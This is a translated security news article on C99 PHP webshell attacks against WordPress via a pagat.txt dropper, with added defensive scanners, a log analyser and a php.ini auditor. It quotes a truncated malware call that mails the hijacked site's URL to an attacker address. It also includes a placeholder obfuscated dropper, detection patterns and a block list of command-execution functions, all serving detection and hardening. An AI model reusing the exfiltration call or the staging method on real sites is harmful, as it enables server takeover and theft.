C99phpwebshell attacks are intensifying, and a large number of WordPress sites are under threat.

Source: Internet
Author: User
Tags: website, server

The IBM Managed Security Services (MSS) team recently warned that it has observed a new wave of attacks in which large numbers of WordPress sites are compromised through the C99 PHP webshell, and urged WordPress site administrators to scan their sites and fix vulnerabilities promptly.

Based on the IBM MSS team's long-term monitoring of malicious events, its researchers found that over the past two months a class of C99 webshell has been responsible for a rise in anomalous traffic: 404 incidents were detected in February and 588 in March (the chart from the original report is not reproduced here).

A webshell lets an attacker upload files to the web server or pass commands to it for execution. Webshells are written in many languages, from PHP to ASP.NET and from JavaScript to Ruby, and give the attacker control of the server; C99 is one of the PHP webshells most commonly used by attackers.

Pagat.txt file

The IBM MSS security team said that attackers usually exploit vulnerabilities in site plug-ins to drop the C99 webshell. In the initial infection stage the webshell script is uploaded to the server and stored as a plain text file, usually named pagat.txt. The file contains obfuscated PHP source code (the code snippet shown in the original report is not reproduced here).

To make the infection harder to detect, attackers do not place this text file in the web root or in the directory of the plug-in they exploited. In most observed cases pagat.txt is stored under a theme directory, at a path of the following form:

“http://www.website-name.com/wp-content/themes/twentythirteen/pagat.txt”

Administrators can check their own WordPress servers for this path, and more generally for any .txt file under wp-content that contains PHP code.
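The check above can be automated. The following is an added example (not code from the IBM MSS report or from WordPress): it walks a WordPress install looking for the pagat.txt dropper name, PHP code hidden in non-PHP files, the eval/base64_decode/gzinflate chain, and a mail() call under wp-content. The sample install it builds, including the stand-in dropper with the "Hasil Bajakan" marker, is constructed for the demonstration and contains no working malware; the threshold of two obfuscation primitives per file is the author's choice to keep single legitimate base64_decode calls from being flagged.

```python
"""Scan a WordPress tree for the pagat.txt dropper and obfuscated PHP.

Added example, not code from the IBM MSS write-up or from WordPress. The file
name, the theme path and the eval/base64_decode/gzinflate chain come from the
text above; the sample install built by build_sample_tree() is constructed for
illustration and contains no working malware.
"""
import os
import re
import tempfile
from dataclasses import dataclass
from typing import List, Optional, Tuple

DROPPER_NAME = "pagat.txt"
# Obfuscation primitives the staged shell relies on. One alone is common in
# legitimate code; two or more in one file is the eval(gzinflate(base64_decode())) pattern.
OBFUSCATION_RE = re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I)
MAIL_RE = re.compile(r"\bmail\s*\(")          # the shell phones home with mail()
CHECKED_EXT = {".txt", ".php", ".phtml", ".inc", ".ico"}  # shells also hide behind odd extensions
MAX_BYTES = 2 * 1024 * 1024                   # webshells are small; skip huge files


@dataclass(frozen=True)
class Finding:
    path: str
    reasons: Tuple[str, ...]


def inspect_file(path: str) -> Optional[Finding]:
    """Return a Finding for a suspicious file, None for a clean one."""
    reasons = []
    name = os.path.basename(path).lower()
    ext = os.path.splitext(name)[1]
    if name == DROPPER_NAME:
        reasons.append("known dropper name")
    if ext in CHECKED_EXT:
        try:
            with open(path, "rb") as fh:
                data = fh.read(MAX_BYTES).decode("utf-8", "ignore")
        except OSError:
            return None
        if ext != ".php" and "<?php" in data:
            reasons.append("PHP code in non-PHP file")
        hits = {m.group(1).lower() for m in OBFUSCATION_RE.finditer(data)}
        if len(hits) >= 2:
            reasons.append("obfuscation chain: " + ", ".join(sorted(hits)))
        if MAIL_RE.search(data) and "/wp-content/" in path.replace(os.sep, "/"):
            reasons.append("mail() call inside wp-content")
    return Finding(path, tuple(reasons)) if reasons else None


def scan(root: str) -> List[Finding]:
    """Walk root (a WordPress install) and collect suspicious files."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for f in files:
            finding = inspect_file(os.path.join(dirpath, f))
            if finding:
                found.append(finding)
    return sorted(found, key=lambda fd: fd.path)


# Constructed stand-in for the dropper: same markers as described, no payload.
FAKE_DROPPER = """<?php
$p = 'eJw...';                      /* placeholder, not real compressed code */
eval(gzinflate(base64_decode($p)));
mail('xxxxx@example.com', $body, "Hasil Bajakan http://$web$inj");
"""


def build_sample_tree() -> str:
    """Create a throwaway WordPress-like directory for the demo (constructed data)."""
    root = tempfile.mkdtemp(prefix="wp-demo-")
    theme = os.path.join(root, "wp-content", "themes", "twentythirteen")
    plugin = os.path.join(root, "wp-content", "plugins", "legit-plugin")
    os.makedirs(theme)
    os.makedirs(plugin)
    with open(os.path.join(theme, "functions.php"), "w") as fh:
        fh.write("<?php\nadd_action('init', 'theme_setup');\n")
    # A single base64_decode in a real plugin is normal and must not be flagged.
    with open(os.path.join(plugin, "legit-plugin.php"), "w") as fh:
        fh.write("<?php\n$icon = base64_decode($encoded_png);\n")
    with open(os.path.join(theme, DROPPER_NAME), "w") as fh:
        fh.write(FAKE_DROPPER)
    return root


if __name__ == "__main__":
    for fd in scan(build_sample_tree()):
        print(fd.path, "->", "; ".join(fd.reasons))
```

Point scan() at the real document root instead of the sample tree; a hit on "obfuscation chain" in a .php file is worth a manual look even without the other indicators, because the same eval(gzinflate(base64_decode())) wrapper is reused by many PHP backdoors, while a lone base64_decode is usually a plug-in decoding an embedded image.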

Attack steps

The attacker then needs a way to feed the contents of the text file to the PHP interpreter on the server (for example through the same vulnerable plug-in). Once the malicious code runs, it generally performs the following operations.

First, it sends an e-mail notifying the attacker of the infected site's exact location. The message goes to a Gmail address and contains the site's domain name and the URL of the webshell:

mail("XXXXX@gmail.com", "$body", "Hasil Bajakan hxxp://$web$inj

(The call is truncated in the original. In PHP's mail() the first argument is the recipient, the second the subject and the third the message body; "Hasil Bajakan" is Indonesian, roughly "hijack result".)

Then it writes a form page into the site directory using the code contained in pagat.txt (the screenshot from the original is not reproduced here).

Finally, the attacker opens the newly created form page in a browser and uses it to pass commands to the server or upload files (the captured page from the original is not reproduced here).

The webshell lets the attacker run shell commands on the server and upload new files to the site; those files may be more capable webshells, DDoS clients, Bitcoin miners or other malware.
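The attack chain just described leaves a recognisable trace in the web server access log: a request touching pagat.txt, followed by POSTs from the same client to a .php page that should not exist under a theme or uploads directory. The following is an added example (not part of the IBM MSS report) that looks for exactly those two stages in Apache/nginx combined-format logs. The log lines, the client addresses, the hostname and the dropped file name form.php are constructed for illustration; the list of normal WordPress POST targets is the author's assumption.

```python
"""Find the C99/pagat.txt attack chain in a web server access log.

Added example, not part of the IBM MSS write-up. The two stages it looks for
follow the steps above: a request touching the pagat.txt dropper, then POSTs
to a .php page that has appeared under a theme or uploads directory. The log
lines, client addresses, hostname and the file name form.php are constructed
for illustration.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Trees that should contain no directly requested PHP entry points; a POST to
# a .php file there matches the "form page" stage of the attack.
WRITABLE_TREES = ("/wp-content/themes/", "/wp-content/uploads/", "/wp-content/upgrade/")
# Normal WordPress POST targets (assumed list), never flagged.
LEGIT_POST = {"/wp-login.php", "/wp-admin/admin-ajax.php", "/wp-admin/admin-post.php",
              "/xmlrpc.php", "/wp-comments-post.php", "/wp-cron.php"}


@dataclass(frozen=True)
class Alert:
    ip: str
    stage: str
    path: str
    time: str


def classify(entry: Dict[str, str]) -> Optional[str]:
    """Map one parsed request to an attack stage, or None if unremarkable."""
    raw = entry["path"]
    path = raw.split("?", 1)[0]
    if "pagat.txt" in raw.lower():           # dropper fetched, or passed in a query string
        return "dropper"
    if (entry["method"] == "POST" and path.endswith(".php")
            and path not in LEGIT_POST
            and any(tree in path for tree in WRITABLE_TREES)):
        return "webshell-form"
    return None


def analyse(lines) -> Dict[str, List[Alert]]:
    """Group stage hits by client IP; unparseable lines are skipped."""
    by_ip: Dict[str, List[Alert]] = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        stage = classify(e)
        if stage:
            by_ip[e["ip"]].append(Alert(e["ip"], stage, e["path"], e["time"]))
    return dict(by_ip)


def chained_attackers(alerts: Dict[str, List[Alert]]) -> List[str]:
    """IPs seen at both stages: high-confidence compromise, not just scanning."""
    return sorted(ip for ip, hits in alerts.items()
                  if {a.stage for a in hits} >= {"dropper", "webshell-form"})


# Constructed sample log (documentation address ranges, fictitious host).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Apr/2016:10:01:02 +0000] "GET /wp-content/themes/twentythirteen/pagat.txt HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Apr/2016:10:01:09 +0000] "POST /wp-content/themes/twentythirteen/form.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Apr/2016:10:02:41 +0000] "POST /wp-content/themes/twentythirteen/form.php HTTP/1.1" 200 410 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Apr/2016:10:05:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "http://blog.example/wp-login.php" "Mozilla/5.0"
198.51.100.23 - - [12/Apr/2016:10:05:20 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 52 "-" "Mozilla/5.0"
192.0.2.9 - - [12/Apr/2016:10:06:00 +0000] "GET /wp-content/themes/twentythirteen/style.css HTTP/1.1" 200 6001 "-" "Mozilla/5.0"
"""


def run_sample() -> Dict[str, List[Alert]]:
    return analyse(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    hits = run_sample()
    for ip in chained_attackers(hits):
        print(ip, [(a.time, a.stage, a.path) for a in hits[ip]])
```

A "webshell-form" hit on its own only says that something POSTed to a PHP file in a directory that should hold no entry points; the same client appearing at both stages is what turns it into an incident rather than a scanner probe, which is why chained_attackers() requires both.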

According to the IBM MSS team, as of the date of its report a Google search alone was enough to find approximately (figure missing in the source) WordPress sites containing the pagat.txt file.

Security suggestions

Given the current situation, site administrators are advised to take the following measures:

1. Restrict dangerous PHP functions in php.ini. The original advice is to find the "disable_functions =" line and set it to "disable_functions = eval, base64_decode, gzinflate". Two caveats apply: eval is a language construct rather than a function, so listing it in disable_functions has no effect; and base64_decode and gzinflate are used by many legitimate plug-ins, so disabling them is likely to break the site. On a host that only serves WordPress it is safer to disable the command-execution functions a webshell actually needs (exec, shell_exec, system, passthru, popen, proc_open) and to catch the obfuscation pattern with file scanning instead;

2. Rename the uploads folder. WordPress writes files submitted through its media uploader into wp-content/uploads by default, so an attacker who has found an upload flaw knows exactly where a file containing a PHP shell will land; the folder can be moved with the UPLOADS constant in wp-config.php. Renaming only raises the attacker's cost slightly, so also configure the web server not to execute .php files anywhere under the uploads directory;

3. Install a reputable security plug-in, such as Wordfence for WordPress;

4. Perform security scans. Deploy a web application firewall such as the open-source ModSecurity to inspect uploads at the HTTP layer, and scan the site regularly with a vulnerability scanner such as AWVS (Acunetix) or a WordPress-specific scanner (for example WPScan) so that vulnerabilities are found, fixed and hardened in time;

5. If the site has already been infected, change the passwords of all administrative accounts immediately and notify site users to change theirs as well. Because the webshell gives full control of the web server, the dropped files (pagat.txt and the generated form page) must also be removed and the database credentials and authentication salts in wp-config.php rotated.
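Because the php.ini advice in step 1 is easy to get wrong, here is an added example (not from the original article or from the PHP project) that audits a disable_functions line: it reports command-execution functions still allowed, names that are language constructs and therefore ineffective in the directive, and entries that will break ordinary plug-ins. The two ini snippets are constructed, and the set of functions to block is the author's assumption about a host that serves only WordPress.

```python
"""Audit a php.ini disable_functions line against the advice above.

Added example, not part of the original article. The ini snippets are
constructed; EXEC_FUNCS is the author's assumption about what a WordPress-only
host can safely block, not a PHP-project recommendation.
"""
import re
from typing import Dict, List, Optional

# Functions a PHP webshell uses to run commands; blocking them on a host that
# only serves WordPress rarely breaks anything.
EXEC_FUNCS = {"exec", "shell_exec", "system", "passthru", "popen", "proc_open", "pcntl_exec"}
# The article suggests disabling these, but ordinary plug-ins use them.
BREAKS_PLUGINS = {"base64_decode", "gzinflate"}
# Language constructs: listing them in disable_functions has no effect.
NOT_FUNCTIONS = {"eval", "include", "require", "include_once", "require_once"}

INI_KEY_RE = re.compile(r"^\s*disable_functions\s*=\s*(?P<val>.*?)\s*$")


def parse_disable_functions(ini_text: str) -> Optional[List[str]]:
    """Names from the last uncommented disable_functions line, or None if absent."""
    value = None
    for line in ini_text.splitlines():
        if line.strip().startswith((";", "#")):   # ini comment
            continue
        m = INI_KEY_RE.match(line)
        if m:
            value = m.group("val").strip().strip('"')
    if value is None:
        return None
    return [name.strip().lower() for name in value.split(",") if name.strip()]


def audit(ini_text: str) -> Dict[str, List[str]]:
    """Classify the configured names; every list is sorted for stable output."""
    report: Dict[str, List[str]] = {"disabled": [], "missing_exec": [], "ineffective": [], "breaks_plugins": []}
    names = parse_disable_functions(ini_text)
    if names is None:                          # no directive at all: everything is allowed
        report["missing_exec"] = sorted(EXEC_FUNCS)
        return report
    present = set(names)
    report["disabled"] = sorted(present)
    report["missing_exec"] = sorted(EXEC_FUNCS - present)
    report["ineffective"] = sorted(present & NOT_FUNCTIONS)
    report["breaks_plugins"] = sorted(present & BREAKS_PLUGINS)
    return report


def recommended_line() -> str:
    return "disable_functions = " + ",".join(sorted(EXEC_FUNCS))


# Constructed snippets: the line as recommended in the article, and a hardened one.
ARTICLE_INI = "; constructed: the setting the article recommends\ndisable_functions = eval, base64_decode, gzinflate\n"
HARDENED_INI = "; constructed: block command execution instead\n" + recommended_line() + "\n"


if __name__ == "__main__":
    for label, ini in (("article", ARTICLE_INI), ("hardened", HARDENED_INI)):
        print(label, audit(ini))
```

After editing php.ini and restarting PHP-FPM or the web server, confirm the live value with php -r 'echo ini_get("disable_functions");' run as the web server user, since a php.ini that the web SAPI never reads is a common reason the directive appears not to work.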

* Reference sources: Softpedia and IBM Security Intelligence; compiled by FreeBuf editor troy. Originally published on FreeBuf (FreeBuf.COM).
